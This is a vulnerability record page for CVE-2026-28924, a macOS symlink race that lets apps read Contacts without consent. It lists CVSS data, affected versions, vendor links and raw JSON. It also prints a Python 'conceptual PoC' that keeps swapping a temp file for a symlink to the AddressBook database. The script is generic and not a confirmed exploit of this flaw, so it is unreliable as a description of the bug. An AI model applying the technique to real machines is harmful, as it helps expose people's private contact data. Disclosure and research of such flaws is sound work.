Security Vulnerability Report
CVE-2026-28924 CVSS 7.5 HIGH

CVE-2026-28924

Published: 2026-05-11 21:18:55
Last Modified: 2026-05-12 17:24:52

Description

A race condition was addressed with improved handling of symbolic links. This issue is fixed in macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5. An app may be able to access Contacts without user consent.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
macOS Sequoia < 15.7.7
macOS Sonoma < 14.8.7
macOS Tahoe < 26.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os
import time

# Conceptual PoC demonstrating a Race Condition on Symbolic Links
# This script simulates the window of opportunity between a security check and file access.

def symbolic_link_race_demo():
    # The benign file that the app intends to access
    benign_file = "/tmp/safe_file.txt"
    # The sensitive target (e.g., Contacts database)
    sensitive_target = "/private/var/db/AddressBook/AddressBook.sqlitedb"

    print("[*] Creating benign file...")
    with open(benign_file, 'w') as f:
        f.write("This is safe content.")

    print("[*] Starting race condition loop...")
    try:
        for i in range(100):
            # Simulate the race: Swap the file with a symlink to the sensitive target
            if os.path.islink(benign_file):
                os.unlink(benign_file)
            elif os.path.exists(benign_file):
                os.remove(benign_file)

            # Create symlink pointing to sensitive data
            os.symlink(sensitive_target, benign_file)
            print(f"[+] Attempt {i}: Symlink created pointing to {sensitive_target}")

            # In a real exploit, the vulnerable app would read 'benign_file' now,
            # inadvertently following the symlink to the sensitive data.
            time.sleep(0.01)
    except Exception as e:
        print(f"Error: {e}")
    finally:
        # Cleanup
        if os.path.islink(benign_file):
            os.unlink(benign_file)

if __name__ == "__main__":
    symbolic_link_race_demo()

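References

https://support.apple.com/en-us/127115 (Release Notes, Vendor Advisory)
https://support.apple.com/en-us/127116 (Release Notes, Vendor Advisory)
https://support.apple.com/en-us/127117 (Release Notes, Vendor Advisory)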

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28924", "sourceIdentifier": "[email protected]", "published": "2026-05-11T21:18:54.727", "lastModified": "2026-05-12T17:24:52.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A race condition was addressed with improved handling of symbolic links. This issue is fixed in macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5. An app may be able to access Contacts without user consent."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0", "versionEndExcluding": "14.8.7", "matchCriteriaId": "DD9E7FAE-30DA-4B2B-A63A-6DFEA7A29933"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.7", "matchCriteriaId": "2984C440-3DC2-413A-B5FA-1FAB21078DB8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.5", "matchCriteriaId": "6CB91417-90A8-4A9B-A1D0-1D94B80EF837"}]}]}], "references": [{"url": "https://support.apple.com/en-us/127115", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127116", 
"source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127117", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}